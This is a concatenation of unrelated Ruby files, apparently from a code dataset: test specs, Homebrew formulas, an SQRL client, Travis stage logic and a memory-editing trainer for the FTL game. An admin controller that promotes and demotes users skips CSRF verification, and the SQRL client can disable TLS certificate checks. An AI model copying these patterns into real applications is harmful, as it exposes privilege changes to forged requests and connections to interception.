expect { |b| test_suite.each_test_case(&b) }
.to yield_successive_args(test_case_success, test_case_failed, test_case_skipped, test_case_error)
end
end
Gitlab::Ci::Reports::TestCase::STATUS_TYPES.each do |status_type|
describe "##{status_type}_count" do
subject { test_suite.public_send("#{status_type}_count") }
context "when #{status_type} test case exists" do
before do
test_suite.add_test_case(public_send("test_case_#{status_type}"))
end
it 'returns the count' do
is_expected.to eq(1)
end
end
context "when #{status_type} test case do not exist" do
it 'returns nothing' do
is_expected.to be(0)
end
end
end
end
end
| 29.488806 | 120 | 0.680501 |
ffc6267e18e1cf98e9406b1c1827e27c3d2634e0 | 2,451 | #!/usr/bin/env ruby
require 'InterfaceFTL'
require 'sys/proctable'
class TrainerFTL
include InterfaceFTL
def hook
matches = Sys::ProcTable.ps.select{|p| p.comm =~ /^FTL$/ }
abort("No PID") if matches.empty?
pid = matches.first.pid
puts "Attaching to PID: #{pid}"
InterfaceFTL.hook pid
end
def activate
keypress_offset = 0x10013ba18
InterfaceFTL.instance.add_breakpoint(keypress_offset) do |thread|
tilde_keycode = 0x60
home_keycode = 0x116
end_keycode = 0x117
case thread.state.r14
when tilde_keycode
puts "\n\n----- Game Report -----\n"
puts "Player controls #{CrewMemberFactory.player_crew_count} crew members"
puts "Player controls #{CrewMemberFactory.enemy_crew_count} enemy crew members"
crew_members = CrewMemberFactory.crew_list
crew_members.each {|member|
puts "\n----- Member Report -----"
puts "Name: #{member.name}"
puts "Health: #{member.health}"
puts "Provides Vision?: #{member.provides_vision?}"
puts "Species: #{member.species}"
puts "Position: (#{member.position_x}, #{member.position_y})"
puts "World Position: (#{member.world_position_x}, #{member.world_position_y})"
puts "Owner Ship: #{member.owner_ship}"
puts "Boarded Ship: #{member.boarded_ship}"
puts "Room Number: #{member.room_number}"
puts "Room Position: (#{member.room_x}, #{member.room_y})"
puts "Ship Address: #{member.ship_address.to_s(16)}"
}
when home_keycode
puts "\n\nKilling enemies when 'Save Positions' is hit\n\n"
crew_members = CrewMemberFactory.crew_list.select{|member| member.owner_ship != 0}
crew_members.each do |member|
puts "Set to kill #{member.name}"
member.add_kill_trigger(0x1000ff42c)
end
when end_keycode
puts "\n\nKilling everyone on enemy ship...\n\n"
crew_members = CrewMemberFactory.crew_list
crew_members.each do |member|
if member.owner_ship != 0
member.health = 0
end
end
else
puts "Unknown key hit. Code: #{thread.state.r14.to_s(16)}"
end
end
end
def process; InterfaceFTL.process_loop; end
end
trainer = TrainerFTL.new
trainer.hook
trainer.activate
trainer.process | 32.68 | 92 | 0.615667 |
0309aef8d24ef2e54c729f33749670fb72a1ee55 | 1,649 | class Pulumi < Formula
desc "Cloud native development platform"
homepage "https://pulumi.io/"
url "https://github.com/pulumi/pulumi.git",
:tag => "v1.13.0",
:revision => "a09e87a5d0627089bb6a4f624fc60efb49298eb7"
bottle do
cellar :any_skip_relocation
sha256 "e414977bca03f121827db68255a65ee9fc3afb28d022733f897e39d46cac94a6" => :catalina
sha256 "6b5f311b5f15de4c16816ee7c26578acd70fbb37312f3aa9c4492cbf2aa77800" => :mojave
sha256 "0abd410c3bb246e15d931fe722a39bcbe28f82a320fb1d4c83af603d6e8f4081" => :high_sierra
sha256 "a43b11bff1cd3f7ed88dcca3aced6cfcef62e9619c88274aa69c926638504697" => :x86_64_linux
end
depends_on "go" => :build
def install
ENV["GOPATH"] = buildpath
ENV["GO111MODULE"] = "on"
dir = buildpath/"src/github.com/pulumi/pulumi"
dir.install buildpath.children
cd dir do
system "go", "mod", "vendor"
system "make", "dist"
bin.install Dir["#{buildpath}/bin/*"]
prefix.install_metafiles
# Install bash completion
output = Utils.popen_read("#{bin}/pulumi gen-completion bash")
(bash_completion/"pulumi").write output
# Install zsh completion
output = Utils.popen_read("#{bin}/pulumi gen-completion zsh")
(zsh_completion/"_pulumi").write output
end
end
test do
ENV["PULUMI_ACCESS_TOKEN"] = "local://"
ENV["PULUMI_TEMPLATE_PATH"] = testpath/"templates"
system "#{bin}/pulumi", "new", "aws-typescript", "--generate-only",
"--force", "-y"
assert_predicate testpath/"Pulumi.yaml", :exist?, "Project was not created"
end
end
| 33.653061 | 94 | 0.676167 |
11278bcd2f4e8df55e9b8015aa19d418fb6dcef5 | 544 | class Admin::UsersController < ApplicationController
before_action :require_login
before_action :require_admin
skip_before_action :verify_authenticity_token
def index; end
def promote
@user = User.find(params[:user_id])
@user.admin = true
@user.save
redirect_to admin_users_path
end
def demote
@user = User.find(params[:user_id])
@user.admin = false
@user.save
redirect_to admin_users_path
end
private
def require_admin
redirect_to adminonly_path unless current_user.admin?
end
end
| 20.148148 | 57 | 0.737132 |
210ce517d04380a224bdda9c8a43e7fd8d0f32e7 | 282 | # frozen_string_literal: true
module Shore
module Custom
# @see https://github.com/JsonApiClient/json_api_client#custom-paginator
class Paginator < JsonApiClient::Paginating::Paginator
self.page_param = 'number'
self.per_page_param = 'size'
end
end
end
| 23.5 | 76 | 0.72695 |
28e76a77e0107a94d564aae86d744df38aeac192 | 560 | # encoding: UTF-8
# Copyright 2012 Twitter, Inc
# http://www.apache.org/licenses/LICENSE-2.0
require 'spec_helper'
include TwitterCldr::Localized
describe LocalizedHash do
describe "#to_yaml" do
it "should be able to successfully roundtrip the hash" do
hash = { foo: "bar", "string_key" => Object.new }
result = YAML.load(hash.localize.to_yaml)
expect(result).to include(:foo)
expect(result).to include("string_key")
expect(result[:foo]).to eq("bar")
expect(result["string_key"]).to be_a(Object)
end
end
end | 25.454545 | 61 | 0.680357 |
218cec2d8567c449b8a6b6eb31bf8d2175209fb7 | 4,383 | # frozen_string_literal: true
RSpec.describe "Macros #maybe" do
describe "with no args" do
subject(:schema) do
Dry::Schema.define do
required(:email).maybe
end
end
it "generates nil? | filled? rule" do
expect { schema }.to raise_error(ArgumentError)
end
end
describe "with a type spec" do
subject(:schema) do
Dry::Schema.define do
required(:email).maybe(:string, format?: /@/)
end
end
it "generates nil? | str? rule" do
expect(schema.(email: nil)).to be_success
expect(schema.(email: "[email protected]")).to be_success
expect(schema.(email: "jane").errors).to eql(email: ["is in invalid format"])
end
end
describe "with a predicate with args" do
subject(:schema) do
Dry::Schema.define do
required(:name).maybe(min_size?: 3)
end
end
it "generates nil? | (filled? & min_size?) rule" do
expect(schema.(name: nil).messages).to be_empty
expect(schema.(name: "jane").messages).to be_empty
expect(schema.(name: "xy").messages).to eql(
name: ["size cannot be less than 3"]
)
end
end
describe "with a block" do
subject(:schema) do
Dry::Schema.define do
required(:name).maybe { str? & min_size?(3) }
end
end
it "generates nil? | (str? & min_size?) rule" do
expect(schema.(name: nil).messages).to be_empty
expect(schema.(name: "jane").messages).to be_empty
expect(schema.(name: "xy").messages).to eql(
name: ["size cannot be less than 3"]
)
end
end
describe "with an optional key and a block with schema" do
subject(:schema) do
Dry::Schema.define do
optional(:employee).maybe(:hash).maybe(:hash?) do
schema do
required(:id).filled(:string)
end
end
end
end
it "passes when input is valid" do
expect(schema.(employee: {id: "1"})).to be_success
end
it "passes when key is missing" do
expect(schema.({})).to be_success
end
it "passes when value is nil" do
expect(schema.(employee: nil)).to be_success
end
it "fails when value for nested schema is invalid" do
expect(schema.(employee: {id: 1}).messages).to eql(
employee: {id: ["must be a string"]}
)
end
end
describe "with a predicate and a block" do
subject(:schema) do
Dry::Schema.define do
required(:name).maybe(:str?) { min_size?(3) }
end
end
it "generates nil? | (str? & min_size?) rule" do
expect(schema.(name: nil).messages).to be_empty
expect(schema.(name: "jane").messages).to be_empty
expect(schema.(name: "xy").messages).to eql(
name: ["size cannot be less than 3"]
)
end
end
context "with a nested hash" do
subject(:schema) do
Dry::Schema.define do
required(:song).maybe(:hash) do
required(:title).filled
required(:author).filled
end
end
end
it "passes when valid" do
song = {title: "World", author: "Joe"}
expect(schema.(song: song)).to be_success
end
it "fails when not valid" do
song = {title: nil, author: "Jane"}
expect(schema.(song: song).messages).to eql(
song: {title: ["must be filled"]}
)
end
it "passes when nil" do
expect(schema.(song: nil)).to be_success
end
end
context "with a nested schema" do
inner_schema = Dry::Schema.define do
required(:name).filled(:string)
end
schema = Dry::Schema.define do
required(:user).maybe(:hash, inner_schema)
end
it "passes when valid" do
expect(schema.(user: {name: "John"})).to be_success
end
it "fails when not valid" do
expect(schema.(user: {name: 1}).errors.to_h).to eq(user: {name: ["must be a string"]})
end
end
context "with an array with nested schema" do
inner_schema = Dry::Schema.define do
required(:name).filled(:string)
end
schema = Dry::Schema.define do
required(:users).maybe(:array).each(inner_schema)
end
it "passes when valid" do
expect(schema.(users: [{name: "John"}])).to be_success
end
it "fails when not valid" do
expect(schema.(users: [{name: 1}]).errors.to_h).to eq(users: {0 => {name: ["must be a string"]}})
end
end
end
| 24.486034 | 103 | 0.597536 |
ac42b960c59bdc4850245e1066f7aea1b169b72a | 253 | require 'spec_helper'
klass = OneviewSDK::LogicalInterconnectGroup
RSpec.describe klass, integration: true, type: DELETE, sequence: rseq(klass) do
let(:current_client) { $client }
include_examples 'LIGC7000DeleteExample', 'integration context'
end
| 31.625 | 79 | 0.790514 |
5d6f4cca3653538342678ea63abfdceb15fee854 | 1,576 | require File.expand_path('../../../spec_helper', __FILE__)
require File.expand_path('../fixtures/classes', __FILE__)
require File.expand_path('../shared/slice', __FILE__)
describe "Array#[]" do
it_behaves_like :array_slice, :[]
end
describe "Array.[]" do
it "[] should return a new array populated with the given elements" do
array = Array[1, 'a', nil]
array[0].should == 1
array[1].should == 'a'
array[2].should == nil
end
it "when applied to a literal nested array, unpacks its elements into the containing array" do
Array[1, 2, *[3, 4, 5]].should == [1, 2, 3, 4, 5]
end
it "when applied to a nested referenced array, unpacks its elements into the containing array" do
splatted_array = Array[3, 4, 5]
Array[1, 2, *splatted_array].should == [1, 2, 3, 4, 5]
end
it "can unpack 2 or more nested referenced array" do
splatted_array = Array[3, 4, 5]
splatted_array2 = Array[6, 7, 8]
Array[1, 2, *splatted_array, *splatted_array2].should == [1, 2, 3, 4, 5, 6, 7, 8]
end
it "constructs a nested Hash for tailing key-value pairs" do
Array[1, 2, 3 => 4, 5 => 6].should == [1, 2, { 3 => 4, 5 => 6 }]
end
describe "with a subclass of Array" do
before :each do
ScratchPad.clear
end
it "returns an instance of the subclass" do
ArraySpecs::MyArray[1, 2, 3].should be_an_instance_of(ArraySpecs::MyArray)
end
it "does not call #initialize on the subclass instance" do
ArraySpecs::MyArray[1, 2, 3].should == [1, 2, 3]
ScratchPad.recorded.should be_nil
end
end
end
| 30.901961 | 99 | 0.646574 |
6a9df819f49a7b188496439fe8c9f9c13732f2aa | 159 | FactoryGirl.define do
factory :user do
name "MyString"
email "MyString"
secret "MyString"
token "MyString"
password "MyString"
end
end
| 15.9 | 23 | 0.666667 |
03328b62b38b582da2ab1c7475e19218756da9fe | 800 | Pod::Spec.new do |s|
s.name = 'LN_Framework'
s.version = '1.1.1'
s.osx.deployment_target = "10.9"
s.ios.deployment_target = "8.0"
#s.tvos.deployment_target = "9.0"
s.watchos.deployment_target = "2.0"
s.license= { :type => "MIT", :file => "LICENSE" }
s.summary = 'Adds the ReactiveObjC.framework library. Made by LionNeo'
s.homepage = 'http://git.oschina.net/lionneo'
s.authors = { 'Lion_Neo' => '[email protected]'}
s.description = <<-DESC
Updated ReactiveObjC.framework; the integrated ReactiveObjC version is 3.1.0
DESC
s.source = { :git => 'https://github.com/LionNeo/LN_Framework.git', :tag => s.version.to_s }
# s.source_files = 'LN_Framework/*.{framework}'
s.vendored_frameworks = 'LN_Framework/ReactiveObjC.framework'
s.requires_arc = true
end | 33.333333 | 96 | 0.63375 |
ac2c56e6ba6b51cf6227d52541991030abc75fe1 | 236 | require('dynabute/values/base')
require('dynabute/values/boolean_value')
require('dynabute/values/datetime_value')
require('dynabute/values/integer_value')
require('dynabute/values/string_value')
require('dynabute/values/select_value')
| 33.714286 | 41 | 0.822034 |
7933892849f59240cc52bb8c2cb2722b32d8b43e | 3,545 | require 'spec_helper_acceptance'
describe 'Inheritance' do
let(:rights) { 'full' }
let(:user_id_child) { 'roberto' }
let(:target_name) { "inherit_#{perm_type}_on_#{asset_type}" }
let(:target_child_name) { "child_#{asset_type}" }
let(:target_child) { "#{target_parent}/#{target_name}/#{target_child_name}" }
let(:acl_manifest) do
<<-MANIFEST
file { "#{target_parent}":
ensure => directory
}
file { "#{target_parent}/#{target_name}":
ensure => directory,
require => File['#{target_parent}']
}
file { "#{target_child}":
ensure => file,
content => '#{file_content}',
require => File['#{target_parent}/#{target_name}']
}
user { "#{user_id}":
ensure => present,
groups => 'Users',
managehome => true,
password => "L0v3Pupp3t!"
}
user { "#{user_id_child}":
ensure => present,
groups => 'Users',
managehome => true,
password => "L0v3Pupp3t!"
}
acl { "#{target_parent}/#{target_name}":
purge => 'true',
permissions => [
{ identity => '#{user_id}',
rights => ['#{rights}'],
perm_type => '#{perm_type}'
},
{ identity => 'Administrators',
rights => ['full']
}
],
inherit_parent_permissions => 'false'
}
->
acl { "#{target_child}":
permissions => [
{ identity => '#{user_id_child}',
rights => ['#{rights}'],
perm_type => '#{perm_type}'
}
],
inherit_parent_permissions => '#{child_inherit_type}'
}
MANIFEST
end
let(:verify_acl_command) { "icacls #{target_child}" }
let(:verify_content_path) { "c:\\temp\\#{target_name}\\#{target_child_name}" }
context 'Explicit Inheritance of "allow" Parent Permissions for File' do
let(:perm_type) { 'allow' }
let(:asset_type) { 'file' }
let(:child_inherit_type) { 'true' }
let(:file_content) { 'Car repair is expensive' }
let(:acl_regex) { %r{.*\\bob:\(I\)\(F\)} }
windows_agents.each do |agent|
include_examples 'execute manifest and verify file', agent
end
end
context 'Explicit Inheritance of "deny" Parent Permissions for File' do
let(:perm_type) { 'deny' }
let(:asset_type) { 'file' }
let(:child_inherit_type) { 'true' }
let(:file_content) { 'Exploding pants on sale for half off.' }
let(:acl_regex) { %r{.*\\bob:\(I\)\(N\)} }
windows_agents.each do |agent|
include_examples 'execute manifest and verify file', agent
end
end
context 'Remove Inheritance of "allow" Parent Permissions for File' do
let(:perm_type) { 'allow' }
let(:asset_type) { 'file' }
let(:child_inherit_type) { 'false' }
let(:file_content) { 'Smell-o-vision: brought to you by the makers of Taste-o-vision!' }
let(:acl_regex) { %r{.*\\bob:\(F\)} }
windows_agents.each do |agent|
include_examples 'execute manifest and verify file', agent
end
end
context 'Remove Inheritance of "deny" Parent Permissions for File' do
let(:perm_type) { 'deny' }
let(:asset_type) { 'file' }
let(:child_inherit_type) { 'false' }
let(:file_content) { 'She smirked as he disdainfully choked down her tasteless humor.' }
let(:acl_regex) { %r{.*\\bob:\(N\)} }
windows_agents.each do |agent|
include_examples 'execute manifest and verify file', agent
end
end
end
| 30.042373 | 92 | 0.569535 |
036eccaa04c4f12ddd3dc6092b1502490ef8eaa7 | 1,375 | module PgHero
module Methods
module Settings
def names
if server_version_num >= 90500
%i(
max_connections shared_buffers effective_cache_size work_mem
maintenance_work_mem min_wal_size max_wal_size checkpoint_completion_target
wal_buffers default_statistics_target
)
else
%i(
max_connections shared_buffers effective_cache_size work_mem
maintenance_work_mem checkpoint_segments checkpoint_completion_target
wal_buffers default_statistics_target
)
end
end
def settings
fetch_settings(names)
end
def citus_worker_settings
citus_fetch_worker_settings(names)
end
def autovacuum_settings
fetch_settings %i(autovacuum autovacuum_max_workers autovacuum_vacuum_cost_limit autovacuum_vacuum_scale_factor autovacuum_analyze_scale_factor)
end
def vacuum_settings
fetch_settings %i(vacuum_cost_limit)
end
private
def fetch_settings(names)
Hash[names.map { |name| [name, select_one("SHOW #{name}")] }]
end
def citus_fetch_worker_settings(names)
Hash[names.map { |name| [name, select_one("SELECT result FROM run_command_on_workers($cmd$ SHOW #{name} $cmd$) LIMIT 1")] }]
end
end
end
end
| 28.645833 | 152 | 0.669091 |
e8a4247d4eb7b2e96ecc482eee2cd3bd59351337 | 1,378 | # frozen_string_literal: true
# Copyright 2021 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Auto-generated by gapic-generator-ruby. DO NOT EDIT!
module Google
module Ads
module GoogleAds
module V8
module Services
# Request message for
# {::Google::Ads::GoogleAds::V8::Services::SmartCampaignSearchTermViewService::Client#get_smart_campaign_search_term_view SmartCampaignSearchTermViewService.GetSmartCampaignSearchTermView}.
# @!attribute [rw] resource_name
# @return [::String]
# Required. The resource name of the Smart campaign search term view to fetch.
class GetSmartCampaignSearchTermViewRequest
include ::Google::Protobuf::MessageExts
extend ::Google::Protobuf::MessageExts::ClassMethods
end
end
end
end
end
end
| 35.333333 | 199 | 0.711901 |
619efa1420e563fbdf7a862ef2fa648a2dd80802 | 928 | cask "prusaslicer" do
version "2.3.2,202107080658"
sha256 "aca73fee3c1a9fa8143ac2667ac8ba9637b944684a59d3e84fa591e02ffd9c9a"
url "https://github.com/prusa3d/PrusaSlicer/releases/download/version_#{version.before_comma}/PrusaSlicer-#{version.before_comma}+universal-#{version.after_comma}.dmg",
verified: "github.com/prusa3d/PrusaSlicer/"
name "PrusaSlicer"
desc "G-code generator for 3D printers (RepRap, Makerbot, Ultimaker etc.)"
homepage "https://www.prusa3d.com/slic3r-prusa-edition/"
livecheck do
url :url
strategy :github_latest do |page|
match = page.match(%r{href=.*?/PrusaSlicer-(\d+(?:\.\d+)*)\+universal-(\d+)\.dmg}i)
"#{match[1]},#{match[2]}"
end
end
app "PrusaSlicer.app"
zap trash: [
"~/Library/Application Support/PrusaSlicer",
"~/Library/Preferences/com.prusa3d.slic3r",
"~/Library/Saved Application State/com.prusa3d.slic3r.savedState",
]
end
| 34.37037 | 170 | 0.709052 |
33c0f9a541f109f3abf46cefd69858310bbc7ac6 | 4,104 | require 'middleman-core/sitemap/resource'
require 'middleman-core/core_extensions/collections/step_context'
module Middleman
module Sitemap
module Extensions
# Manages the list of proxy configurations and manipulates the sitemap
# to include new resources based on those configurations
class Proxies < ConfigExtension
self.resource_list_manipulator_priority = 0
# Expose `proxy`
expose_to_config :proxy
# Setup a proxy from a path to a target
# @param [String] path The new, proxied path to create
# @param [String] target The existing path that should be proxied to. This must be a real resource, not another proxy.
# @option opts [Boolean] ignore Ignore the target from the sitemap (so only the new, proxy resource ends up in the output)
# @option opts [Symbol, Boolean, String] layout The layout name to use (e.g. `:article`) or `false` to disable layout.
# @option opts [Boolean] directory_indexes Whether or not the `:directory_indexes` extension applies to these paths.
# @option opts [Hash] locals Local variables for the template. These will be available when the template renders.
# @option opts [Hash] data Extra metadata to add to the page. This is the same as frontmatter, though frontmatter will take precedence over metadata defined here. Available via {Resource#data}.
# @return [ProxyDescriptor]
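# @example Hypothetical usage (illustrative addition based on the documented options, not from the original file)
#   proxy '/about/tom.html', '/about/template.html', locals: { person_name: 'Tom' }, ignore: true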
Contract String, String, Maybe[Hash] => RespondTo[:execute_descriptor]
def proxy(path, target, opts={})
ProxyDescriptor.new(
::Middleman::Util.normalize_path(path),
::Middleman::Util.normalize_path(target),
opts.dup
)
end
end
ProxyDescriptor = Struct.new(:path, :target, :metadata) do
def execute_descriptor(app, resources)
md = metadata.dup
should_ignore = md.delete(:ignore)
r = ProxyResource.new(app.sitemap, path, target)
r.add_metadata(
locals: md.delete(:locals) || {},
page: md.delete(:data) || {},
options: md
)
if should_ignore
d = ::Middleman::Sitemap::Extensions::Ignores::IgnoreDescriptor.new(target)
d.execute_descriptor(app, resources)
end
resources + [r]
end
end
end
class Resource
def proxy_to(_path)
throw 'Resource#proxy_to has been removed. Use ProxyResource class instead.'
end
end
class ProxyResource < ::Middleman::Sitemap::Resource
Contract String
attr_reader :target
# Initialize resource with parent store and URL
# @param [Middleman::Sitemap::Store] store
# @param [String] path
# @param [String] target
def initialize(store, path, target)
super(store, path)
target = ::Middleman::Util.normalize_path(target)
raise "You can't proxy #{path} to itself!" if target == path
@target = target
end
# The resource for the page this page is proxied to. Throws an exception
# if there is no resource.
# @return [Sitemap::Resource]
Contract IsA['Middleman::Sitemap::Resource']
def target_resource
resource = @store.find_resource_by_path(@target)
unless resource
raise "Path #{path} proxies to unknown file #{@target}:#{@store.resources.map(&:path)}"
end
if resource.is_a? ProxyResource
raise "You can't proxy #{path} to #{@target} which is itself a proxy."
end
resource
end
Contract IsA['Middleman::SourceFile']
def file_descriptor
target_resource.file_descriptor
end
def metadata
target_resource.metadata.deep_merge super
end
Contract Maybe[String]
def content_type
mime_type = super
return mime_type if mime_type
target_resource.content_type
end
def to_s
"#<#{self.class} path=#{@path} target=#{@target}>"
end
alias inspect to_s
end
end
end
| 34.2 | 201 | 0.637427 |
11308edd66f7c4af25e9f5d9711f61b19a77d685 | 3,515 | require "sqrl/tif"
require "sqrl/cmd/version"
require "httpclient"
module SQRL
class Cmd
private
def create_session(url)
url = upgrade_url(url)
session = ClientSession.new(url, [imk, pimk].compact)
log.debug headline('-', 'Site Keys')
log.debug data_field('imk', imk)
log.debug format_site_key(session.site_key)
if pimk
log.debug data_field('pimk', imk)
log.debug format_site_key(session.previous_site_key)
end
log.debug headline('-')
puts "SFN: \"#{session.server_friendly_name}\"\n"
session
end
SqrlHeaders = {'Content-Type' => 'application/x-www-form-urlencoded'}
SqrlRequest = {
:agent_name => "SQRL/1 SQRL::Cmd/#{SqrlCmd::VERSION}",
:default_header => SqrlHeaders,
}
def verbose_request(server_string, session = nil, retries = 1)
session ||= create_session(server_string)
req = QueryGenerator.new(session, session.server_string)
req.opt(*opt)
req = yield req if block_given?
log.info format_params(req.client_data, 'Client Data')
log.debug data_field("Client String", req.client_string)
log.debug format_params(req.to_hash, 'Query')
log.info headline('-', 'Request')
log.info "POST #{req.post_path}"
log.debug req.post_body
log.debug ""
h = HTTPClient.new(SqrlRequest)
h.ssl_config.verify_mode = OpenSSL::SSL::VERIFY_NONE unless verify_cert?
res = h.post(req.post_path, req.post_body)
log.info "Response: #{res.status}"
log.debug res.body
log.info headline('-')
log.info ""
parsed = ResponseParser.new(res.body).update_session(session)
parsed.tif_base = tif_base
log.info format_params(parsed.params, 'Response')
if parsed.transient_error? && retries > 0
standard_display(parsed) if log.level <= Logger::INFO
puts "Transient error, retrying"
verbose_request(session.server_string, session, retries - 1)
else
parsed
end
rescue Errno::ECONNREFUSED => e
log.error e.message
session.server_string = server_string
ResponseParser.new({'exception' => e})
end
def print_tif(tif)
print_table SQRL::TIF.map {|bit, flag|
if (tif & bit) != 0
[bit.to_s(16), flag.to_s.upcase]
else
[' ', flag]
end
}
end
def standard_display(parsed)
print_tif(parsed.tif)
puts [parsed.ask.message, parsed.params['sfn']].compact.join(' -- ')
end
def open_browser(url)
case RbConfig::CONFIG['host_os']
when /mswin|mingw|cygwin/; system "start #{url}"
when /darwin/; system "open #{url}"
when /linux|bsd/; system "xdg-open #{url}"
else puts url
end
end
def headline(h = '-', s = nil)
if s
l = 76 - s.length
[h*(l/2), s, h*((l+1)/2)].join(' ')
else
h*78
end
end
def data_field(key, value)
"%10s : %s" % [key, value]
end
def format_params(params, title = nil)
[
headline('-', title),
params.map {|key, value|
data_field(key, value)
},
headline('-'),
"",
].flatten.join("\n")
end
def format_site_key(site_key)
[
data_field('private', Base64.encode(site_key.instance_variable_get('@private_key').to_bytes)),
data_field('public', Base64.encode(site_key.public_key)),
].join("\n")
end
end
end
| 28.346774 | 102 | 0.598293 |
795fccfc0ac8a7f028bb295c529eb2593b34aed9 | 3,268 | # We have keys with this semantical meaning:
#
# 1.1.1.1 \
# 1.1.2.1 3.1
# 1.1.1.2 / \ /
# 2.1
# / \
# 1.2.1.1 - 1.2.2.1 3.2
#
# In other words:
#
# 1.1.1.1 start 1.1.1.1, 1.1.1.2, and 1.2.1.1 in parallel
# 1.1.1.2
# 1.1.2.1 start once 1.1.1.1 and 1.1.1.2 have completed
# 1.2.1.1
# 1.2.2.1 start once 1.2.1.1 has completed
# 2 start once 1.1.2.1 and 1.2.2.1 have completed
# 3.1 start 3.1 and 3.2 once 2 has completed
# 3.2
#
# We transform this into a tree structure like the following, dropping all
# jobs that are not in a startable state (i.e. `created`).
#
# 1
# 1.1
# 1.1.1
# 1.1.1.1
# 1.1.1.2
# 1.2
# 1.2.1
# 1.2.1.1
# 1.2.2
# 1.2.2.1
# 2
# 2.1
# 3
# 3.1
# 3.2
#
# Then, in order to determine startable jobs we can:
#
# * Select the first branch
# * From this branch select all first branches (1.1.1 and 1.2.1)
# * From these branches select all leafs
#
# This mechanism doesn't seem overly generic, but I cannot come up with any other
# way that would not
#
# * either not select 1.2.1.1 as startable (when all jobs are :created)
# * or not exclude 1.2.2.1 from being startable
#
# If anyone can come up with a more generic mechanism then I'd be extremely
# happy to hear it :)
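#
# A minimal usage sketch (the job hashes below are made up; the keys match
# what `build` reads, and the stage keys follow the diagram above):
#
#   jobs = [
#     { id: 1, state: :created, stage: '1.1.1.1' },
#     { id: 2, state: :created, stage: '1.1.1.2' },
#     { id: 3, state: :created, stage: '1.1.2.1' },
#     { id: 4, state: :created, stage: '1.2.1.1' }
#   ]
#
#   Travis::Stages.build(jobs).startable.map(&:id) # => [1, 2, 4]
#
# i.e. job 1.1.2.1 is held back until both 1.1.1.x jobs have completed.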
module Travis
module Stages
def self.build(jobs)
jobs.inject(Stage.new(nil, 0)) do |stage, job|
job = Job.new(*job.values_at(:id, :state, :stage))
stage << job unless job.finished?
stage
end
end
class Stage
attr_reader :parent, :num, :children
def initialize(parent, num)
@parent = parent
@num = num.to_i
@children = []
parent.children << self if parent
end
def <<(job)
node = job.leaf? ? children : stage(job.nums.shift)
node << job
end
def startable
if first.is_a?(Stage)
first.children.map(&:startable).flatten
else
children.select(&:startable?).map(&:to_h)
end
end
def root?
key == '0'
end
def key
[parent && parent.key != '0' ? parent.key : nil, num].compact.join('.')
end
def inspect
indent = ->(child) { child.inspect.split("\n").map { |str| " #{str}" }.join("\n") }
"#{root? ? 'Root' : "Stage key=#{key}"}\n#{children.map(&indent).join("\n")}"
end
private
def stage(num)
stages.detect { |stage| stage.num == num } || Stage.new(self, num.to_i)
end
def stages
children.select { |child| child.is_a?(Stage) }
end
def first
children.first
end
end
class Job < Struct.new(:id, :state, :key)
def leaf?
nums.size == 1
end
def nums
@nums ||= key.split('.').map(&:to_i)
end
def startable
startable? ? [self] : []
end
def startable?
state && state.to_sym == :created
end
def finished?
state && state.to_sym == :finished
end
def inspect
"Job key=#{key} state=#{state}"
end
end
end
end
| 22.853147 | 92 | 0.518054 |
01aa883d56dd2ad50036a9e493c4bd793b206090 | 1,855 | require_relative '../spec_helper'
require_relative '../../lib/rapid-vaults/generate'
describe Generate do
context '.openssl' do
after(:all) do
%w[key.txt nonce.txt].each { |file| File.delete(file) }
end
it 'generates the key and nonce files from the cli' do
Generate.openssl(ui: :cli)
expect(File.file?('key.txt')).to be true
expect(File.file?('nonce.txt')).to be true
expect(File.read('key.txt')).to be_a(String)
expect(File.read('nonce.txt')).to be_a(String)
end
it 'outputs an array with the key and nonce from the api' do
generate = Generate.openssl(ui: :api)
expect(generate).to be_a(Array)
expect(generate[0]).to be_a(String)
expect(generate[1]).to be_a(String)
expect(generate.length).to eq(2)
end
end
context '.gpgme' do
it 'raises an error for a missing GNUPGHOME variable' do
expect { Generate.gpgme(gpgparams: File.read("#{fixtures_dir}/gpgparams.txt")) }.to raise_error('Environment variable "GNUPGHOME" was not set.')
end
# travis ci cannot support non-interactive gpg
unless File.directory?('/home/travis')
it 'generates the key files' do
require 'fileutils'
ENV['GNUPGHOME'] = fixtures_dir
Generate.gpgme(gpgparams: File.read("#{fixtures_dir}/gpgparams.txt"))
%w[trustdb.gpg pubring.kbx pubring.kbx~].each do |file|
expect(File.file?("#{fixtures_dir}/#{file}")).to be true
File.delete("#{fixtures_dir}/#{file}")
end
%w[openpgp-revocs.d private-keys-v1.d].each do |dir|
expect(File.directory?("#{fixtures_dir}/#{dir}")).to be true
FileUtils.rm_r("#{fixtures_dir}/#{dir}")
end
%w[S.gpg-agent random_seed].each { |file| File.delete("#{fixtures_dir}/#{file}") if File.exist?(file) }
end
end
end
end
| 36.372549 | 150 | 0.636119 |
2600f265df15011770bf1c5b74ea62c56c6c02ad | 1,003 | class Jhiccup < Formula
desc "Measure pauses and stalls of an app's Java runtime platform"
homepage "https://www.azul.com/jhiccup/"
url "https://www.azul.com/files/jHiccup-2.0.10-dist.zip"
sha256 "7bb1145d211d140b4f81184df7eb9cea90f56720ad7504fac43c0c398f38a7d8"
livecheck do
url :homepage
regex(/href=.*?jHiccup[._-]v?(\d+(?:\.\d+)+)-dist\.zip/i)
end
bottle :unneeded
def install
bin.install "jHiccup", "jHiccupLogProcessor"
# Simple script to create and open a new plotter spreadsheet
(bin+"jHiccupPlotter").write <<~EOS
#!/bin/sh
TMPFILE="/tmp/jHiccupPlotter.$$.xls"
cp "#{prefix}/jHiccupPlotter.xls" $TMPFILE
open $TMPFILE
EOS
prefix.install "jHiccup.jar"
prefix.install "jHiccupPlotter.xls"
inreplace "#{bin}/jHiccup" do |s|
s.gsub! /^JHICCUP_JAR_FILE=.*$/,
"JHICCUP_JAR_FILE=#{prefix}/jHiccup.jar"
end
end
test do
assert_match "CSV", shell_output("#{bin}/jHiccup -h", 255)
end
end
| 27.108108 | 75 | 0.663011 |
ab8229dbae1b7339505478d93bc278819f6be903 | 6,870 | require "cases/migration/helper"
module ActiveRecord
class Migration
class ColumnAttributesTest < ActiveRecord::TestCase
include ActiveRecord::Migration::TestHelper
self.use_transactional_tests = false
def test_add_column_newline_default
string = "foo\nbar"
add_column "test_models", "command", :string, default: string
TestModel.reset_column_information
